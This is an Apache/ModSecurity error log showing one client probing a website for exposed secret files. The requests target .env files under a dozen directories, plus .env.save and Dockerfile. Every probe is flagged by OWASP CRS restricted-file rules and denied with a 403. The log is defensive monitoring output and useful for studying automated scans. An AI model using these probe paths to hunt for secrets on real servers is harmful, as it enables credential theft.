[Fri Jan 09 16:49:22.645994 2026] [:error] [pid 1290986] [client 18.130.245.147:42754] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/src/.env"] [unique_id "aWEjgnvPx48oXeBpWHAqXQAAAAE"]
[Fri Jan 09 16:49:22.740991 2026] [:error] [pid 1290989] [client 18.130.245.147:42768] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env"] [unique_id "aWEjgrwxb_CFGAx2PBFTBQAAAAQ"]
[Fri Jan 09 16:49:22.741192 2026] [:error] [pid 1290989] [client 18.130.245.147:42768] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env"] [unique_id "aWEjgrwxb_CFGAx2PBFTBQAAAAQ"]
[Fri Jan 09 16:49:22.741351 2026] [:error] [pid 1290989] [client 18.130.245.147:42768] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env"] [unique_id "aWEjgrwxb_CFGAx2PBFTBQAAAAQ"]
[Fri Jan 09 16:49:22.842941 2026] [authz_core:error] [pid 1290988] [client 18.130.245.147:42788] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Fri Jan 09 16:49:22.945845 2026] [:error] [pid 1291018] [client 18.130.245.147:42808] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aWEjgva-381C0T8V_x3aYgAAAAU"]
[Fri Jan 09 16:49:22.946061 2026] [:error] [pid 1291018] [client 18.130.245.147:42808] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aWEjgva-381C0T8V_x3aYgAAAAU"]
[Fri Jan 09 16:49:22.946225 2026] [:error] [pid 1291018] [client 18.130.245.147:42808] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aWEjgva-381C0T8V_x3aYgAAAAU"]
[Fri Jan 09 16:49:23.047256 2026] [:error] [pid 1290987] [client 18.130.245.147:42834] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/server/.env"] [unique_id "aWEjg5a6YpMWICkHe7jGVgAAAAI"]
[Fri Jan 09 16:49:23.047465 2026] [:error] [pid 1290987] [client 18.130.245.147:42834] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/server/.env"] [unique_id "aWEjg5a6YpMWICkHe7jGVgAAAAI"]
[Fri Jan 09 16:49:23.047634 2026] [:error] [pid 1290987] [client 18.130.245.147:42834] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/server/.env"] [unique_id "aWEjg5a6YpMWICkHe7jGVgAAAAI"]
[Fri Jan 09 16:49:23.138432 2026] [:error] [pid 1293937] [client 18.130.245.147:42850] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aWEjgy30tpu2Qs_7o9csCwAAAAY"]
[Fri Jan 09 16:49:23.138649 2026] [:error] [pid 1293937] [client 18.130.245.147:42850] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aWEjgy30tpu2Qs_7o9csCwAAAAY"]
[Fri Jan 09 16:49:23.138832 2026] [:error] [pid 1293937] [client 18.130.245.147:42850] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aWEjgy30tpu2Qs_7o9csCwAAAAY"]
[Fri Jan 09 16:49:23.235847 2026] [:error] [pid 1295009] [client 18.130.245.147:42874] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/Dockerfile"] [unique_id "aWEjgxOQmYLXvoRWxa_UrAAAAAc"]
[Fri Jan 09 16:49:23.236062 2026] [:error] [pid 1295009] [client 18.130.245.147:42874] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/Dockerfile"] [unique_id "aWEjgxOQmYLXvoRWxa_UrAAAAAc"]
[Fri Jan 09 16:49:23.236222 2026] [:error] [pid 1295009] [client 18.130.245.147:42874] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/Dockerfile"] [unique_id "aWEjgxOQmYLXvoRWxa_UrAAAAAc"]
[Fri Jan 09 16:49:23.337235 2026] [:error] [pid 1295010] [client 18.130.245.147:42900] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aWEjgyTjpONdb2ogUxonsAAAAAg"]
[Fri Jan 09 16:49:23.337449 2026] [:error] [pid 1295010] [client 18.130.245.147:42900] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aWEjgyTjpONdb2ogUxonsAAAAAg"]
[Fri Jan 09 16:49:23.337605 2026] [:error] [pid 1295010] [client 18.130.245.147:42900] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aWEjgyTjpONdb2ogUxonsAAAAAg"]
[Fri Jan 09 16:49:23.439361 2026] [:error] [pid 1290985] [client 18.130.245.147:42926] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aWEjgwhnMz7Kl76N6_LzfgAAAAA"]
[Fri Jan 09 16:49:23.439568 2026] [:error] [pid 1290985] [client 18.130.245.147:42926] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aWEjgwhnMz7Kl76N6_LzfgAAAAA"]
[Fri Jan 09 16:49:23.439727 2026] [:error] [pid 1290985] [client 18.130.245.147:42926] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aWEjgwhnMz7Kl76N6_LzfgAAAAA"]
[Fri Jan 09 16:49:23.536798 2026] [:error] [pid 1290986] [client 18.130.245.147:42948] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/frontend/.env"] [unique_id "aWEjg3vPx48oXeBpWHAqXgAAAAE"]
[Fri Jan 09 16:49:23.537007 2026] [:error] [pid 1290986] [client 18.130.245.147:42948] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/frontend/.env"] [unique_id "aWEjg3vPx48oXeBpWHAqXgAAAAE"]
[Fri Jan 09 16:49:23.537175 2026] [:error] [pid 1290986] [client 18.130.245.147:42948] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/frontend/.env"] [unique_id "aWEjg3vPx48oXeBpWHAqXgAAAAE"]
[Fri Jan 09 16:49:23.634150 2026] [:error] [pid 1290989] [client 18.130.245.147:42974] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aWEjg7wxb_CFGAx2PBFTBgAAAAQ"]
[Fri Jan 09 16:49:23.634376 2026] [:error] [pid 1290989] [client 18.130.245.147:42974] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aWEjg7wxb_CFGAx2PBFTBgAAAAQ"]
[Fri Jan 09 16:49:23.634553 2026] [:error] [pid 1290989] [client 18.130.245.147:42974] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aWEjg7wxb_CFGAx2PBFTBgAAAAQ"]
[Fri Jan 09 16:49:23.730114 2026] [:error] [pid 1290988] [client 18.130.245.147:42990] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aWEjg5nqcf3ij-c56sst-AAAAAM"]
[Fri Jan 09 16:49:23.730321 2026] [:error] [pid 1290988] [client 18.130.245.147:42990] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aWEjg5nqcf3ij-c56sst-AAAAAM"]
[Fri Jan 09 16:49:23.730614 2026] [:error] [pid 1290988] [client 18.130.245.147:42990] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aWEjg5nqcf3ij-c56sst-AAAAAM"]
[Fri Jan 09 16:49:23.824559 2026] [:error] [pid 1291018] [client 18.130.245.147:43010] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aWEjg_a-381C0T8V_x3aYwAAAAU"]
[Fri Jan 09 16:49:23.824760 2026] [:error] [pid 1291018] [client 18.130.245.147:43010] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aWEjg_a-381C0T8V_x3aYwAAAAU"]
[Fri Jan 09 16:49:23.824913 2026] [:error] [pid 1291018] [client 18.130.245.147:43010] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aWEjg_a-381C0T8V_x3aYwAAAAU"]
[Fri Jan 09 16:49:23.922101 2026] [:error] [pid 1290987] [client 18.130.245.147:43032] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aWEjg5a6YpMWICkHe7jGVwAAAAI"]
[Fri Jan 09 16:49:23.922321 2026] [:error] [pid 1290987] [client 18.130.245.147:43032] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aWEjg5a6YpMWICkHe7jGVwAAAAI"]
[Fri Jan 09 16:49:23.922504 2026] [:error] [pid 1290987] [client 18.130.245.147:43032] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aWEjg5a6YpMWICkHe7jGVwAAAAI"]
[Fri Jan 09 16:49:24.022809 2026] [:error] [pid 1293937] [client 18.130.245.147:43056] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aWEjhC30tpu2Qs_7o9csDAAAAAY"]
[Fri Jan 09 16:49:24.023012 2026] [:error] [pid 1293937] [client 18.130.245.147:43056] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aWEjhC30tpu2Qs_7o9csDAAAAAY"]
[Fri Jan 09 16:49:24.023247 2026] [:error] [pid 1293937] [client 18.130.245.147:43056] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aWEjhC30tpu2Qs_7o9csDAAAAAY"]
